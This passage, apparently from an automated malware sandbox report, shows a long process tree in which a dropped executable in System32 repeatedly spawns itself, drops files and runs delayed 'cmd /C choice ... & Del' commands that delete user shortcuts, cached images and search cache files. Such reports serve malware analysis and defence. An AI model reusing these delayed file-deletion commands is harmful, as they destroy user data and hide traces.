PID:7084 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"13⤵
- Executes dropped EXE
PID:6968 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"14⤵
- Executes dropped EXE
PID:7264 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"15⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:7000 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"16⤵
- Executes dropped EXE
PID:7004 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"17⤵
- Executes dropped EXE
PID:6572 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"18⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:7360 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"19⤵
- Executes dropped EXE
PID:7436 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"20⤵
- Executes dropped EXE
PID:15188 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"21⤵
- Executes dropped EXE
PID:9296 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"22⤵
- Executes dropped EXE
PID:8444 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"23⤵
- Executes dropped EXE
PID:4676 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"24⤵
- Executes dropped EXE
PID:9044 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"25⤵
- Executes dropped EXE
PID:10248 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"26⤵
- Executes dropped EXE
PID:10312 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"27⤵
- Executes dropped EXE
PID:15748 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"28⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:11000 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"29⤵
- Checks computer location settings
- Executes dropped EXE
PID:15296 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"30⤵
- Executes dropped EXE
PID:15336 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"31⤵
- Executes dropped EXE
PID:11440 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"32⤵
- Executes dropped EXE
PID:10724 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"33⤵PID:8432
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 334⤵PID:8024
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"33⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:15604 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"34⤵PID:8556
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 335⤵PID:13032
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"34⤵PID:9608
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 335⤵PID:11164
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"34⤵PID:15424
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 335⤵PID:12192
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"34⤵
- Executes dropped EXE
PID:15420 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"35⤵PID:16180
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 336⤵PID:7424
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"35⤵PID:15272
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 336⤵PID:9616
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"35⤵PID:16184
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 336⤵PID:10480
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"35⤵
- Executes dropped EXE
PID:9224 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"36⤵PID:14824
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 337⤵PID:16392
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"36⤵PID:16004
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 337⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"36⤵PID:15816
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 337⤵PID:4040
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"36⤵
- Executes dropped EXE
PID:1064 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"37⤵PID:4336
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 338⤵PID:9864
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"37⤵PID:15392
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 338⤵PID:10604
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"37⤵PID:15404
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 338⤵PID:10500
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"37⤵
- Executes dropped EXE
PID:15884 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"38⤵PID:7840
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 339⤵PID:10568
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"38⤵PID:9584
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 339⤵PID:11032
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"38⤵PID:8644
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 339⤵PID:10324
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"38⤵
- Checks computer location settings
- Executes dropped EXE
PID:8828 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"39⤵PID:15236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 340⤵PID:9448
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"39⤵PID:12440
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 340⤵PID:10212
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"39⤵PID:11724
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 340⤵PID:11560
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"39⤵
- Executes dropped EXE
PID:7016 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"40⤵PID:3616
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 341⤵PID:11940
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"40⤵PID:8692
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 341⤵PID:16132
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"40⤵PID:10772
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 341⤵PID:9840
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"40⤵
- Executes dropped EXE
PID:13408 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"41⤵PID:10528
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 342⤵PID:15856
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"41⤵PID:9016
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 342⤵PID:16496
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"41⤵PID:11868
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 342⤵PID:4300
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"41⤵
- Executes dropped EXE
PID:3988 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"42⤵PID:16652
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 343⤵PID:8812
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"42⤵PID:16604
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 343⤵PID:9480
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"42⤵PID:15768
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 343⤵PID:9348
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"42⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:16228 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"43⤵PID:3912
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 344⤵PID:9628
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\New folder.lnk"43⤵PID:10492
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 344⤵PID:7316
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"43⤵PID:10448
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 344⤵PID:13332
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"43⤵
- Executes dropped EXE
PID:748 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"44⤵PID:1604
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 345⤵PID:15640
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"44⤵PID:15920
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 345⤵PID:11636
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"44⤵
- Executes dropped EXE
PID:15940 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\Desktop.lnk"45⤵PID:11524
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 346⤵PID:9372
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\This PC.lnk"45⤵PID:14732
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 346⤵PID:10208
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"45⤵PID:16476
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 346⤵PID:13328
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"45⤵
- Checks computer location settings
- Executes dropped EXE
PID:9536 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"46⤵PID:10288
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 347⤵PID:16648
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"46⤵PID:16956
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 347⤵PID:16316
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"46⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:16296 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"47⤵PID:12364
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 348⤵PID:9576
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"47⤵PID:11188
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 348⤵PID:11748
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"47⤵
- Checks computer location settings
- Executes dropped EXE
PID:16828 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"48⤵PID:11972
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 349⤵PID:16008
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"48⤵PID:16980
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 349⤵PID:16840
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"48⤵
- Checks computer location settings
- Executes dropped EXE
PID:16720 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"49⤵PID:16348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 350⤵PID:16736
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"49⤵PID:17092
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 350⤵PID:16220
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"49⤵
- Checks computer location settings
- Executes dropped EXE
PID:16520 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"50⤵PID:17084
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 351⤵PID:9612
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"50⤵PID:17064
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 351⤵PID:16788
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"50⤵
- Checks computer location settings
- Executes dropped EXE
PID:15908 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"51⤵PID:16796
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 352⤵PID:10032
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"51⤵PID:11348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 352⤵PID:11728
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"51⤵
- Executes dropped EXE
PID:10044 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"52⤵PID:13940
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 353⤵PID:12696
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"52⤵PID:11028
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 353⤵PID:12392
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"52⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:13512 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"53⤵PID:12680
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 354⤵PID:12612
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"53⤵PID:12804
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 354⤵PID:12040
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"53⤵
- Checks computer location settings
- Executes dropped EXE
PID:10896 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"54⤵PID:2204
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 355⤵PID:10728
-
-
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"54⤵PID:12948
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 355⤵PID:11292
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"54⤵
- Executes dropped EXE
PID:14984 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"55⤵PID:12648
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 356⤵PID:10612
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"55⤵
- Executes dropped EXE
PID:15240 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"56⤵PID:12788
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 357⤵PID:11536
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"56⤵
- Executes dropped EXE
PID:13196 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"57⤵PID:10004
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 358⤵PID:14320
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"57⤵
- Executes dropped EXE
PID:11604 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133588438395536323.txt"58⤵PID:12732
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 359⤵PID:12304
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"58⤵
- Executes dropped EXE
PID:14884 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"59⤵
- Executes dropped EXE
PID:13192 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"60⤵
- Executes dropped EXE
PID:14740 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"61⤵
- Executes dropped EXE
PID:12172 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"62⤵
- Executes dropped EXE
PID:13716 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"63⤵
- Drops file in System32 directory
PID:14176 -
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"64⤵PID:12964
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"65⤵PID:12880
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"66⤵PID:14868
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"67⤵PID:13256
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"68⤵
- Drops file in System32 directory
PID:13584 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"69⤵PID:13916
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 370⤵PID:17564
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"69⤵PID:13816
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"70⤵PID:17220
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 371⤵PID:17344
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"70⤵PID:17268
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"71⤵PID:17984
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 372⤵PID:18360
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"71⤵
- Drops file in System32 directory
PID:17720 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"72⤵PID:6192
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 373⤵PID:17604
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"72⤵PID:18044
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"73⤵PID:17888
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 374⤵PID:17752
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"73⤵
- Checks computer location settings
PID:17736 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"74⤵PID:5240
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 375⤵PID:17900
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"74⤵PID:18068
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"75⤵PID:18248
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 376⤵PID:18324
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"75⤵PID:6812
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"76⤵PID:5888
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 377⤵PID:18268
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"76⤵PID:17636
-
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"77⤵PID:17920
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 378⤵PID:18036
-
-
-
C:\Windows\System32\kdmvcldlg.exe"C:\Windows\System32\kdmvcldlg.exe"77⤵
- Checks computer location settings
PID:17916 -
C:\Windows\System32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg"78⤵PID:4788
-
